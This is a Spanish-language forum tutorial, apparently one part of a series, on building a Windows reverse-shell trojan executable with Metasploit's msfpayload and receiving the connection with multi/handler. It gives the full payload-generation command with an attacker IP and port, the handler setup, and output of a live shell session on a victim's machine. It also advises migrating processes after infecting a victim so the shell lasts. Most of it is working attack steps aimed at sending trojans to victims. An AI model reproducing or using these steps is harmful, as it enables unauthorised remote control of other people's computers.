+Temario
-+¿Reverse Shell?
-+¿Payload binario(.EXE)?
-+Configurancion y compilacion
-+Estudiando la configuracion
-+¿Multi/handler?
-+Configuracion y "escuchando"
-+Conclusion
- Bueno ya emos visto como backdorear un binario
pero no emos visto como podemos hacer un payload
binario y que quiero decir con esto? Me refiero a que
no ejecute nada mas que nuestro payload.
+¿Reverse Shell?
- Bueno repasemos como el nombre nos dice
un reverse shell es una shell reversa y esto
funciona asi en lugar de que nosotro busquemos
la shell, la shell nos busca a nosotro como un "troyano"
obvio al puro stylo de msf jejejejj XD !!
+¿Payload binario(.EXE)?
- Bien asi como suena aremos nuestro payload binario
esto quiere decir que sera un ejecutable que solo contendra
nuestra payload selecionada previamente jejejje
"Troyano al stylo msf"
- Bueno vamos a poner un reverse tcp como payload y lo compilaremos
poniendo nuestro puerto a usar y nuestra payload selecionada yo usare
esta pero ustedes pueden usar cualquier otra les recuerdo el comando
search en msf o show payloads ...
vamos a la carpeta donde tenemos nuestro msf y tecleamos
Código: Seleccionar todo
shiva-sheva@cracker:~/metasploit$ sudo ./msfpayload windows/shell_reverse_tcp LHOST=187.152.162.199 LPORT=666 X > /home/shiva-sheva/pay.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: LHOST=187.152.162.199,LPORT=666
shiva-sheva@cracker:~/metasploit$
- sudo ./msfpayload: Llamamos a msfpayload con derechos sudo
windows/shell_reverse_tcp: Ruta de nuestro payload
LHOST=187.152.162.199: Nuestra ip
LPORT=666: Puerto que usaremos
X > /home/shiva-sheva/pay.exe: Indicamos que sera ejecutable y la ruta donde queremos guardarlo!
- Bueno handler lo podremos definir como un tipo de
listener configurable a nuestro antojo para poder
esuchar conexiones que nos quieran hacer es decir...
Si enviamos nuestro payload binario a una victima podamos
recibir la conexion de lo conotrario no se podra!!!
IMPORTANTE:Cuando aya infectado a la victima recuerde usar migrate
para poder migrar el proceso y nunca muero nuestra shell inversa o
por lo menos que dure mas tiempo....
- Bueno ahora lanzaremos el handler para poder escuchar la conexion
y poder "interceptarla" vamos a la shell y escribimos...
Código: Seleccionar todo
shiva-sheva@cracker:~/metasploit$ sudo ./msfconsole
- Llamamos a msfconsole
dentro de ella damos
Código: Seleccionar todo
msf > use exploit/multi/handler
- Ahora tenemos que indicar el payload que usamos!
Código: Seleccionar todo
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
- Ok todo perfecto hasta ahora ahora vamos a ver las opciones que tenemos que configurar...
Código: Seleccionar todo
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Wildcard Target
- Indicamos LHOST que es nuestra ip e indicamos el LPORT que es el puerto
Código: Seleccionar todo
msf exploit(handler) > set LHOST 187.152.162.199
LHOST => 187.152.162.199
msf exploit(handler) > set LPORT 666
LPORT => 666
- Podemos proceder a lanzarlo de esta forma!
Código: Seleccionar todo
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
- Y si es que ya abrio nuestro troyano al stylo msf nos saldra esto
Código: Seleccionar todo
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (187.152.162.199:666 -> xxx.xx.xxx.243:1150)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\BY-K4RL\My Documents>
- Bueno puse los xxx.xxx.xxx.xxx para proteger los datos del onweado jejejej
y bueno asi se simple es el pentest ustedes saben si se la complican o no!
+Conclusion
- Bueno vimos algo interesante esta vez ya sabes
como hacer nuestro troyanos al mero estylo de msf
jejeje y bueno esperen la parte VIII veremos algo
muy importante para complementar esta parte!Saludos!